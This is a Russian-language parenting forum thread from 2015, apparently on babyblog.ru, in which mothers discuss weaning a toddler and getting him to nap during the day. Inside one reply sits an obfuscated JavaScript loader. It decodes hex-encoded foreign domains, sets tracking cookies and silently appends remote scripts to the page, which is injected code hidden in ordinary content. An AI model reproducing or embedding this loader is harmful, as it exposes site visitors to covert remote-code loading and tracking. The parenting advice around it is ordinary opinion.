Завершаю гв. Сынулька отказывается спать днём :(

Старший перестал днём спать после отлучения. Он, правда, постарше был.. У нас никак не укладывалтся, редко редко мог заснуть часов в 6 вечера. Сейчас в саду спит, потому что встаёт рано. Так что вроде как сны вернулись))
05.10.2015
Вам нужно придумать определенный ритуал засыпания для ребенка, как ранее писали про "умыл,положил под одеялко", первого сына я кормила до 2 лет и 1 месяца, с ним было просто договориться ведь он рано начал говорить и все понимал, с ним мы решили что титю он больше не кушает,но может перед сном прижаться к тите щечкой и потом заснуть. Со вторым сыном сложнее было,он не так хорошо разговаривает и многое пытается выныть, но ему я тоже сказала что титя пустая и она спит, его я приучала засыпать днем в своей кроватке таксу него меньше соблазна и грудь не маячит перед глазками,поначалу он сопротивлялся и ревел,я была спокойна и настойчива, дала ему его любимую игрушку и сказала что игрушка хочет спать,и что бы она уснула сыну надо лежать с ней рядышком,поворачивала сына на бочек,укрывала одеялом,говорила что бы положил ручки под щечку, пела песенки и рассказывала сказки.иногда получалось уснуть без истерик,иногда приходилось успокаивать,и повторять все с начала.порой на засыпание уходило 1,5 -2 часа. теперь он засыпает днем сам. главное быть последовательной и настойчивой,делать все уверенно и безопеляционно. ребенок должен понимать что есть определенные правила и нужно им следовать. Если мама сдается и прогибается то ребенок понимает,что в семье главный он,а взрослые ничего не решают и стоит поныть все вокруг становится по его. В свою очередь вы все это должны делать уверенно и с большой любовью. Ребенок должен чувствовать что мамочка любит его и что она не сердится.
05.10.2015
Спасибо за развернутый ответ)) буду пробовать. А если днём на сон давать грудь, он потом, наверное,будет целый день просить? Просто до этого так и было)
06.10.2015
Вы можете говорить, что грудь только когда ляжем спать, а ляжем спать после того то и того то (то есть по вашей опять же инициативе)
06.10.2015
В 1.8 два дневных сна много. может, хотя бы 1 оставите? и грудь на сон
05.10.2015
А кормить на сон - никак? У нас вот в три года неделю муж укладывал без проблем и днем и на ночь. Сегодня муж не смог, пытаюсь уложить я - хоть сын и старался целый час, уснуть не смог. И под конец этого часа попросил все таки грудь - две минуты и спит)
05.10.2015
Ну с грудью конечно сразу уснет) а как тогда отучать?
05.10.2015
ну я собственно к тому, что так уж прям надо отучать? я понимаю, что дневные кормления могут быть утомительными, неудобными, но на сон гораздо проще кормить до готовности ребенка к отлучению. или хотя бы пока все зубы не прорежутся или ребенок не научится хорошо разговаривать. потому что пока малыша что то мучает - зубы или не умение высказаться о своих потребностях, лишение еще и груди- это очень жестоко. это плохо сказывается не только на психике ребенка, но и на ваших с ним отношениях. а когда малыш будет готов, отлучить от груди перед сном самый легкий и лучший способ - покормить умыть и положить под одеялко. Это на дневной сон, а на ночной покормить, умыть, почистить зубы, почитать книжки и опять таки уложить под одеялко. Сначала с грудью, потом прежде чем дать грудь выйти из комнаты на несколько секунд, пообещав вернуться. Постепенно увеличивать время отсутствия в комнате, пока однажды не вернетесь к спящему ребенку. Если ребенок настойчиво вас зовет и тем более плачет, лучше вернуться и дать грудь и ждать готовности малыша к таким экспериментам.
05.10.2015
Спасибо) видимо так и буду делать
06.10.2015
А если на улицу вывести в коляске не засыпает? Я когда убрала дневное кормление,дочь тоже перестала дома засыпать,но как толькл вывожу на улицу,засыпает через минуту
05.10.2015
В коляске уже с года не хочет сидеть :(
05.10.2015
Мы тоже завершаем!Три дня укладывала из них два в машине засыпала!А на ночь давала грудь.А потом истерики начались не могла уложить не выдержала и дала.Мне уже таблетки пить надо врач назначил мы все никак !Жалко ее!Постою послушаю что вам скажут![removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21670",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
05.10.2015
Вот-вот, в машине быстро засыпает :) а как дома уложить, не знаю(
05.10.2015
А я поныть... Малышка "цокает" при кормлении